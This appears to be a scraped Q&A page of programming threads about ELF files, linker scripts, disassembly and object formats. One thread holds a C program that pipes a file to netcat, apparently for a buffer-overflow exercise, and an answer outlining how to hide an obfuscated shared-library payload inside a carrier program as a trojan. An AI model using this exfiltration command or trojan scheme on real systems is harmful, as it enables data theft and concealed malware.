ELF binary from memory - c

I just wrote a Hello world program in C that I was playing around with. I'd like to try and dump the binary from memory(using gdb) and try to create another executable from it. I tried dumping the page with executable privileges followed by its data page; however it segfaults. Are there any approaches to doing this? Is there any way I can debug and find out why it crashes? Any generic suggestions at all?
Thanks.
[EDIT]
Its on linux and I've tried it on both 32 and 64-bit x86. The kernel version is 3.13. I set a breakpoint on _start, dumped the executable page followed by its data page to a file and tried executing it.

Wait, are you just dumping the mapped text (exectuable page) section followed by the mapped data section to a file? That itself wouldn't be a valid ELF object, an ELF file needs an ELF header as well. I am surprised the OS even let you attempt to execute that, you should have gotten an error about an invalid ELF header or something like that.
In addition to the header, an ELF file contains many more sections that are important to be able to run it.
As for debugging, I'd start with GDB to see where it crashes. Does your program crash, or does the dynamic linker crash when trying to load your program? If the dynamic linker crashes, try debugging that, e.g. with
gdb --args /lib64/ld-2.18.so <your program>
Attempts to re-create ELF files from memory have been done before - have a look at Statifier, which even statically includes all loaded dynamic libraries into the resulting ELF.

It might be not very simple and is certainly processor and operating system specific.
You could look at emacs source unexec.c which is doing what you want. See this answer

Related

How to compile a library for a fixed address in microblaze

I want to build a library which is relocatable (ie. nothing other than local variables. I also want to force the location of the library to be at a fixed location in memory. I think this has to be done in the makefile, but I am confused as to what I have to do to force the library to be loaded at a fixed location. This is using mb-gcc.
The reason I need this is I want to write a loader where I dont want to clobber over the code that is actually doing the copy of the other program. So I want the program that is doing the copying to be located somewhere else at a location that is not being used (ie. ddr).
If I have all the functions that do the compiled into a library, what special makefile arguments do I need to force this to be loaded at location 0x80000000 for example.
Any help would be greatly appreciated. Thanks in advance.
You write a linker script, and tell the compiler/linker to use it by using the -T script.ld option (to gcc and/or ld, depending on how you build your firmware files).
In your library C source files, you can use the __attribute__((section ("name"))) syntax to put your functions and variables into a specific section. The linker script can then decide where to put each section -- often at a fixed address for these kinds of devices. (You'll often see macro declarations like #define FIRMWARE __attribute__((section(".text.firmware"))) or similar, to make the code easier to read and understand.)
If you create a separate firmware file just for your library, then you don't need to add the attributes to your code, just write the linker script to put the .text (executable code), .rodata (read-only constants), and .bss (uninitialized variables) sections at suitable addresses.
A web search for microblaze "linker script" finds some useful examples, and even more guides. Some of them must be suitable for your tools.

How do you convert c code into assembly's hex representation?

Edit: It appears I have a lot more reading to do...
Also, for those telling me this is a bad idea, it's for a buffer overflow exercise.
I have a fairly simple C program:
int main() {
system("cat file | nc -p 33 localhost 8080");
return 0;
}
I want to turn it into hex assembly code. Think something like:
\x55\x43\xff\x75\x13\x77...
I tried doing:
gcc -o shell shell.c
for i in $(objdump -d shell -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
And that gave me a nice long string of hex. But when I tested it in this program, I got a segfault.
code = "\x55\x43\xff\x75\x13\x77..."
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
Anyone know how I can get this working? Thanks! Also, I don't know if it matters but it's a 64 bit system.
You are missing a whole bunch of stuff that the OS does for you between the time the binary code is loaded from disk and it is executed. The function call "system(char *command)" for example: The pointer to the command characters is invalid until the OS loader "fixes" the pointers.
If you are very, very careful you can construct code that does not rely on pointers and can run from any arbitrary address without help from the OS loader. This is how stack overflow exploits are created. Most modern CPUs prevent this code from running by using the memory manager to mark memory as either "DATA" or "CODE" and faulting if your program tries to execute DATA or write to CODE.
What you are trying to do, the OS is trying to prevent.
This won't work. The main reason is: What your compiler creates for you is not just plain binary code but a well-defined file-format for a runnable program (on windows a PE file, on linux an ELF file) This file is read by the dynamic linker of your operating system and preprocessed (e.g. linked to dynamic shared objects, read libraries) before it is executed by jumping to the entry point that is somehow given in the headers of the file. There's no way such a file could be executed by just jumping to the first byte in the file. In fact, it's the linker that creates the output format, but it's invoked by the compiler automatically.
If you JUST want the assembler code, use gcc -S ... you will get mnemonics that could be fed to a standalone assembler.
There are ways to trick the linker to emit a plain binary of your code (See here an interesting read about how to use that to generate an MS-DOS .COM file), but you still have the problem that your program typically doesn't consist of only the text (read, the binary code executed) but you also have data, typically in .data segment (for readonly) and .bss segment (for readwrite).
Adding to that, placing the binary in a c string will normally put it in the .data segment. Although this could be executable, it doesn't have to, and from a security point of view, it shouldn't -- see Data Execution Prevention.
All in all, just forget about that...
I'm not sure what you are trying to achieve, but if I put my black hat on for a minute...
If you are trying to write a stack overflow exploit, you need to learn about the memory manager and the gory details of the target CPU. You will be dealing strictly with the CPU and circumventing the OS entirely.
If you are trying to write a trojan horse, you should compile your payload as a dynamic library (.so) and put the hex for the entire payload.so file into code[]. Then, in the carrier program, map code[] to a virtual file (or just write it to disk) and call loadlibrary() on the (virtual) file. You still won't be root, but your payload will be buried inside the first executable. You can bit-twiddle the code[] bytes to obfuscate the payload. You will also need to figure out how to set the executable flag on the newly created file.
For either of these, you will be working against the CPU and/or OS.

What's the difference between binary and executable files mentioned in ndisasm's manual?

I want to compile my C file with clang and then decompile it with with ndisasm (for educational purposes). However, ndisasm says in it's manual that it only works with binary and not executable files:
ndisasm only disassembles binary files: it has
no understanding of the header information
present in object or executable files. If you
want to disassemble an object file, you should
probably be using objdump(1).
What's the difference, exactly? And what does clang output when I run it with a simple C file, an executable or a binary?
An object file contains machine language code, and all sorts of other information. It sounds like ndisasm wants just the machine code, not the other stuff. So the message is telling you to use the objdump utility to extract just the machine code segment(s) from the object file. Then you can presumably run ndisasm on that.
And what does clang output when I run it with a simple C file, an executable or a binary?
A C compiler is usually able to create a 'raw' binary, which is Just The Code, hold the tomato, because for some (rare!) purposes that can be useful. Think, for instance, of boot sectors (which cannot 'load' an executable the regular way because the OS to load them is not yet started) and of programmable RAM chips. An Operating system in itself usually does not like to execute 'raw binary code' - pretty much for the same reasons. An exception is MS Windows, which still can run old format .com binaries.
By default, clang will create an executable. The intermediate files, called object files, are usually deleted after the executable is linked (glued together with library functions and an appropriate executable header). To get just a .o object file, use the -c switch.
Note that Object files also contain a header. After all, the linker needs to know what the file contains before it can link it to other parts.
For educational purposes, you may want to examine the object file format. Armed with that knowledge it should be possible to write a program that can tell you at what offset in the file the actual code starts. Then you can feed that information into ndisasm.
In addition to the header, files may contain even more data after the instructions. Again, ndisasm does not know and nor does it care. If your test program contains a string Hello world! somewhere at the end, it will happily try to disassemble that as well. It's up to you to recognize this garbage as such, and ignore what ndisasm does to it.

Getting stack offsets of variables from debugging symbols

When I build a program with debugging information (gcc -g), gdb is able to tell me addresses of local variables inside a function. Thus, the debugging symbols must contain enough information to calculate this (i.e. an offset from ebp), and since gdb uses libbfd to read debugging symbols, I should be able to as well.
However, libbdf's documentation seems to have nothing on this. Can libbfd give me this information?
libbfd will provide access to the ELF file, opening the file, getting access to the contents of the section, but interpreting these contents is not something that libbfd does, this is something the application would need to do.
Usually, debugging information is encoded using DWARF.
There are libraries for interpreting DWARF however, gdb includes it's own code for parsing DWARF.

Usage differences between. a.out, .ELF, .EXE, and .COFF

Don't get me wrong by looking at the question title - I know what they are (format for portable executable files). But my interest scope is slightly different
MY CONFUSION
I am involved in re-hosting/retargeting applications that are originally from third parties. The problem is that sometimes the formats for object codes are also in .elf, .COFF formats and still says, "Executable and linkable".
I am primarily a Windows user and know that when you compile and assemble your C/C++ code, you get something similar to .o or .obj. that are not executable (well, I never tried to execute them). But when you complete linking static and dynamic libraries and finish building, the executable appears. My understanding is that you can then go about and link that executable or "bash" test it with some form of script if necessary.
However, in Linux (or UNIX-like systems) there are .o files after you compile and assemble the C/C++ code. And once the linking is done, the executable is in a.out format (at least in Ubuntu distribution of Linux). It may very well be .elf in some other distrib. In my quick web search none of the sources mentioned anything about .o files as executables.
QUESTIONS
Therefore my question turns into the followings:
What is the true definitions for portable executables and object code?
How is it that Windows and UNIX platform covers both executables annd object code under the same file format (.COFF, .elf).
Am I misinterpreting "Linkable"? My interpretation of "Linkable" is something that is compiled object code and can then be "linked" to other static/dynamic link libraries. Is this a stupid thought?
Based on question 1. (and perhaps 2) do I need to use symbol tables (e.g. .LUM or .MAP files) with object code then? Symbols as in debug symbols and using them when re-hosting the executables/object files on a different machine.
Thanks in advance for the right nudges. Meanwhile, I will keep digging and update the question if necessary.
UPDATE
I have managed to dig this out from somewhere :( Seems like a lot to swallow to me.
I am primarily a Windows user and know that when you compile your C/C++ code, you get something similar to .o or .obj. that are not executable
Well, last time I compiled stuff on Windows, the result of the compilation was an .obj file, which is exactly what its name suggests: it's an object file. You're right in that it's not an executable in itself. It contains machine code which doesn't (yet) contain enough information to be directly run on the CPU.
However, in Linux (or UNIX-like systems) there are .o files after you compile the C/C++ code. And once the linking is done, the executable is in a.out format (at least in Ubuntu distribution of Linux). It may very well be .elf in some other distrib.
Living in the 90's, that is :P No modern compilers I am aware of target the a.out format as their default output format for object code. Maybe it's a misleading default of GCC to put the object code into a file called a.out when no explicit output file name is specified, but if you run the file command on a.out, you'll find out that it's an ELF file. The a.out format is ancient and it's kind of "de facto obsolete".
What is the true definitions for portable executables and object code?
You've already got the Wikipedia link to object files, here's the one to "Portable Executable".
How is it that Windows and UNIX platform covers both executables annd object code under the same file format (.COFF, .elf).
Because the ELF format (and apparently COFF too) has been designed like so. And why not? It's just the very same machine code after all, it seems quite logical to use one file format during all the compilation steps. Just like we don't like when dynamic libraries and stand-alone executables have a different format. (That's why ELF is called ELF - it's an "Executable and Linkable Format".)
Am I misinterpreting "Linkable"?
I don't know. From your question it's not clear to me what you think "linkable" is. In general, it means that it's a file that can be linked against, i. e. a library.
Based on question 1. (and perhaps 2) do I need to use symbol tables (e.g. .LUM or .MAP files) with object code then? Symbols as in debug symbols and using them when re-hosting the object files on a different machine.
I think this one is not related to the executable format used. If you want to debug, you have to generate debugging information no matter what. But if you don't need to debug, then you're free to omit them of course.

Resources